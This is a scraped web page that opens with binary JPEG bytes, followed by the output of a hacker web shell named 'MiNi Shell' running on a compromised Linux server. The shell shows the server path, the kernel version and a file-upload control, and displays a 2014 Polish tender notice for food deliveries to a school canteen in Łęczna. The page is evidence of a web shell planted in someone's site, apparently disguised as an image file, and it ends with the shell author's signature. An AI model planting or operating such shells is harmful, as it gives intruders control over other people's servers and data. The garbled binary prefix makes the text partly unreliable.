JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141202/394870-N-2014.html

<p class="kh_header"><b>Łęczna: DOSTAWA ŻYWNOŚCI DO STOŁÓWKI SZKOLNEJ</b><br>
<b>Numer ogłoszenia: 394870 - 2014; data zamieszczenia: 02.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 2 w Łęcznej z Klasami Integracyjnymi i Oddziałami Sportowymi , ul. Jaśminowa 6, 21-010 Łęczna, woj. lubelskie, tel. 0-81 4627003, faks 0-81 4628415.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zs2-leczna@wp.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> zs2-leczna@wp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ŻYWNOŚCI DO STOŁÓWKI SZKOLNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów żywnościowych do stołówki szkolnej.  Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SIWZ od 4.1. do 4.9.  Wykonawca zobowiązuje się do zaopatrywania Zamawiającego w artykuły spożywcze w pierwszym gatunku, których termin ważności upływa nie wcześniej niż 5 dni po dacie dostawy oraz z cechami podanymi w SIWZ.  Poszczególne zamówienia będą składane telefonicznie  w dni robocze w godzinach między 7 - 14.  Wykonawca zobowiązuje się dostarczyć towar do siedziby Zamawiającego własnym transportem, na własny koszt i własne ryzyko oraz do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu lub całości dostawy.  W przypadku stwierdzenia przez Zamawiającego wadliwej partii dostarczonego towaru, reklamacja zostanie zgłoszona telefonicznie. Wykonawca zobowiązuje się do jego wymiany na towar wolny od wad w ciągu 3 godzin, w ilościach zakwestionowanych przez Zamawiającego. Nie wykonanie pełnego zakresu ilościowego umowy nie rodzi roszczenia o zakup nie zrealizowanej w okresie obowiązywania umowy ilości towaru.
8. Dopuszcza się zmiany cen produktów stanowiących przedmiot zamówienia w oparciu o wskaźnik cen towarów i usług konsumpcyjnych publikowany, co miesiąc przez GUS.  Każdy samochód, którym będzie dostarczana żywność musi posiadać decyzję Państwowego Powiatowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów (art. spoż, warzywa, owoce, jaja, mięso i wędliny itp.) Zamawiający zastrzega sobie prawo do zażądania stosownego dokumentu w momencie dostawy produktów. Mięso i wędliny muszą być dostarczane w czystych, zamkniętych pojemnikach do przewozu mięsa i wędlin. Mięso surowe nie może być przewożone razem z wędlinami.  Mrożonki mają być dostarczane w formie nie rozmrożonej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.10.00-6, 15.10.00.00-9, 03.22.00.00-9, 03.22.00.00-9, 15.33.11.70-9, 15.50.00.00-3, 03.31.10.00-2, 03.22.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 1</li>
<li>2 - Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zs2-leczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół nr 2 z Klasami Integracyjnymi i Oddziałami Sportowymi w Łęcznej
ul. Jaśminowa 6, 
21-010 Łęczna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2014 godzina 11:00, miejsce: Sekretariat Zespołu Szkół nr 2 z Klasami Integracyjnymi i Oddziałami Sportowymi w Łęcznej
ul. Jaśminowa 6, 
21-010 Łęczna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet rybny mrożony- RYBA MORSKA (miruna, błękitek, dorsz)gat. I, bez lodu	kg	400
Filet rybny mrożony- RYBA MORSKA (dorsz)gat. I, bez lodu	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 18 % op. Min 1L gat. I 	Szt.	600
Śmietana 30% do ubijania op. Min 1L gat. I	Szt.	300
Śmietana 12 % op. Min 1l gat. I	Szt.	250
Twaróg półtłusty krajanka. gat. I	Kg	250
Twaróg półtłusty mielony gat. I	kg	250
Ser żółty gat. I	Kg	120
Mleko 2%-3% op. Folia min 1l	Szt.	250
Masło ekstra zawartość tłuszczu 82 % op. min 200 g. gat. I	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka kompotowa op. min 2 kg gat. I	kg	1200
Wiśnie b/pestki op. min 2 kg gat. I	kg	70
Truskawki op. Min 2 kg gat. I	kg	200
Marchewka z groszkiem op. Min 2 kg gat. I	kg	200
Kalafior op. Min 2 kg gat. I	kg	120
Brokuł op. Min 2 kg gat. I	kg	70
Fasolka szparagowa op. Min 2 kg gat. I	kg	60
Groszek zielony op. min. 2 kg gat. I	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Produkty owocowo- warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki gat. I	kg	20000
Marchewka gat. I	kg	2000
Pietruszka gat. I	kg	350
Seler gat. I	kg	200
Buraki czerwone gat. I	kg	850
Por gat. I	kg	450
Kapusta biała gat. I	kg	850
Kapusta czerwona gat. I	kg	200
Kapusta pekińska gat. I	kg	250
Kapusta włoska gat. I	kg	350
Kapusta młoda gat. I	Szt.	250
Koperek gat. I	Szt.	200
Natka pietruszki gat. I	Szt.	600
Ogórek świeży gat. I	kg	300
Pomidory gat. I	kg	250
Sałata gat. I	Szt.	450
Papryka gat. I	kg	100
Cebula gat. I	kg	550
Czosnek gat. I	Szt.	150
Kalafior gat. I	Szt.	100
Brokuł gat. I	Szt.	50
Fasolka szparagowa gat. I	kg	50
Szczypiorek gat. I	Szt.	150
Rzodkiewka gat. I	Szt.	200
Szczaw gat. I	kg	12
Śliwki gat. I	kg	250
Truskawki gat. I	kg	200
Jabłka gat. I	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb zwykły, krojony 600g.	Szt.	3600
Bułka tarta op. papierowe min. 500g. 	kg	250
Pączki 100 g.	Szt.	390.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso z kurczaka gulaszowe gat. I	kg	100
Mięso z indyka gulaszowe gat. I	kg	100
Ćwiartka z kurczaka gat. I	kg	550
Kurczaki gat. I	kg	500
Filet z kurczaka gat. I	kg	600
Filet z indyka gat. I	kg	150
Mięso drobiowe z nogi surowe bez przypraw gat. I	kg	200
Porcja rosołowa ze skrzydełkiem 	kg	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso gulaszowe wieprzowe gat. I	kg	1800
Schab b/ kości gat. I	kg	250
Karkówka b/ kości gat. I	kg	100
Szynka wieprzowa surowa b/kości gat. I	kg	100
Łopatka wieprzowa b/kości gat. I	kg	200
Szynka wołowa b/kości gat. I	kg	200
Kości pokrzepowe gat. I	kg	150
Boczek surowy łuskany gat. I	kg	180
Flaki suche podgotowane krojone gat. I	kg	100
Kiełbasa zwyczajna gat. I	kg	280
Boczek wędzony łuskany gat. I	kg	220
Smalec op. min. 200 g gat. I	kg	50
Kiełbasa śląska	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Produkty ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier biały, sypki, op. papier. 1 kg gat. I Kg 1300. Cukier  puder op. min. 400g. gat. I Kg 60. Cukier wanilinowy op. papier. min.30 g. gat. I Szt. 120. Mąka pszenna poznańska typ.500 op. papier. 1kg gat. I Kg 1100. Mąka ziemniaczana op. papier.1 kg gat. I Kg 150. Kasza jęczmienna op.min400g. gat.  I Kg 50. Kasza jęczmienna saszetka 100g. gat. I Kg 250. Kasza gryczana saszetka op. 400g. gat. I.Kg 120. Ryż biały op. papier. 1 kg gat. I Kg 80. Ryż biały saszetka 100g. gat. I Kg 300. Makaron (kolanka, rurki, świderki, nitki, łazanka, spaghetti)op. min.0,5kg gat. I. Skład:100%mąka z pszenicy durum. Typ LUBELLA lub równoważny Kg 1100. Sól jodowana op. folia 1 kg gat. I Kg 400. Barszcz biały w postaci proszku bez konserwantów, op. min. 1 kg gat. I Kg 15. Barszcz czerwony w postaci proszku bez konserwantów, op. min. 1 kg gat. I Kg 18. Fasola sucha gat. I Kg 150. Groch łuskany gat. I Kg 50. Pieczarki gat. I Kg 100. Kukurydza konserwowa op. puszka min.340-285g gat. I Kg 15. Groszek konserwowy op. puszka min 400-240g gat. I Kg 10. Ogórki konserwowe op. słoik min 870g gat. I Kg 450. Koncentrat pomidorowy30% op. słoik-puszka min 800g. gat. I Kg 100. Chrzan tarty op. słoik min.600 g. gat. I Kg 30. Seler cięty sałatkowy op. słoik min. 1700ml. Gat. I Kg 40. Szczaw konserwowy op. słoik min. 330g. gat. I Kg 20. Dżemy niskosłodzone ZAWARTOŚĆ OWOCÓW 50g-100g op. słoik wiaderko plastik. min. 900 g smaki wiśnia, czarna porzeczka, brzoskwinia gat. I Kg 130. Jabłka prażone op. min.900g słoik-wiaderko plastik. gat. I Kg 250. Olej rzepakowy z pierwszego tłoczenia op. min. 5l butelka plastik. gat. I Szt. 130. Galaretka owocowa bez sztucznych barwników , różne smaki op. papier. min. 75 g gat. I Szt. 300. Kasza manna op. papier. 1 kg Kg  20. Soda oczyszczana op. Papier. Min. 30 g gat. I Szt. 10. Pieprz czarny mielony op. Papier. 20g gat. I Szt. 300. Pieprz ziołowy  skład: kolendra, gorczyca biała, kminek, papryka, czosnek, kozieradka, majeranek. Op. papier. 20g gat. I Szt. 300. Majeranek otarty op. Papier. 14g gat. I Szt. 150. Liść laurowy op. Papier. 6 g. gat. I Szt. 250. Ziele angielskie op. Papier. 15 g. gat. I Szt. 300. Sosy sałatkowe różne smaki w postaci proszku op. Min. 600 g. gat. I bez konserwantów i sztucznych barwników typ KNOR lub równoważne Kg 10. Przyprawa do potraw w postaci proszku op. Min. 250 g gat. I skład: sól suszone warzywa min. 15,5 % marchew, cebula, pietruszka ,seler  tłuszcz roślinny, por, papryka słodka, natka pietruszki. Bez konserwantów i sztucznych barwników. Kg 100. Przyprawa do kurczaka w postaci proszku op. Min. 250 g. gat. I skład: sól, papryka, cebula , czosnek, majeranek, pieprz,  kolendra, tymianek, kurkuma, natka pietruszki, liść laurowy, imbir, kmin rzymski, gorczyca biała, goździki, bez konserwantów i sztucznych barwników. Kg 10. Przyprawa do mięs w postaci proszku op. Min. 250g. gat. I skład: papryka, mąka pszenna, cebula, aromaty, tłuszcz roślinny, czosnek, natka pietruszki, rozmaryn, pieprz, oregano, tymianek, gałka muszkatołowa, majeranek, papryka, bez konserwantów i sztucznych barwników. Kg 10. Zioła toskańskie, dalmatańskie (mieszanka przypraw)op. min. 25 g gat. I Szt. 50. Przyprawa do bigosu w postaci proszku op. Min. 20 g. gat. I bez konserwantów i sztucznych barwników. Szt. 100. Sosy w postaci proszku ( bolognese, myśliwski, słodko kwaśny, grzybowy, pieczeniowy, serowy, węgierski) op. min. 700 g. gat. l bez konserwantów i sztucznych barwników. Typ. KNOR lub równoważny Kg 40. Przyprawa do gulaszu w postaci proszku op. Min. 1 kg gat. I Skład: papryka mielona, maltodekstryna, sól, tłuszcz roślinny, cebula suszona, 8,5 %, pomidory suszone mielone 4,6 %,cukier, aromaty, sos sojowy, czosnek, kminek, majeranek, liść laurowy  bez konserwantów i sztucznych barwników. Typ. KNOR lub równoważne Kg 15. Przyprawa do zup w płynie op. Min. 1 l skład: woda, sól, ekstrakty drożdżowe ( w tym jęczmień), cukier, aromaty, tłuszcz kurzy, skrobia modyfikowana, regulator kwasowości, kwas cytrynowy Szt. 12. Rosół drobiowy w postaci proszku op. Min. 500 g. gat. I Kg 10. Majonez dekoracyjny op. Słoik wiaderko plastik. Min.700 g. I olej roślinny, żółtko jaj 6 %, ocet, musztarda  Kg 100. Kwasek cytrynowy op. Papier. Min. 20 g. gat. I Szt. 900. Przyprawa do ryb w postaci proszku op. Min.600 g. gat. I Kg 3. Przyprawa do flaków w postaci proszku op. Papier. Min. 20g. gat. I Szt. 50. Ocet 10 % op. Butelka min. 0,5 l gat. L Szt. 20. Czosnek granulowany 100% naturalny op.25 g.   Szt. 100. Jaja Szt. 6500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warzywa kiszone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kapusta kiszona naturalnie (bez dodatku octu i sztucznych konserwantów)	kg	2000
Ogórki kiszone (bez odcieku)	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 1</li>
<li>2. Termin płatności wyrażony w dniach liczony od dnia wystawienia faktury - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com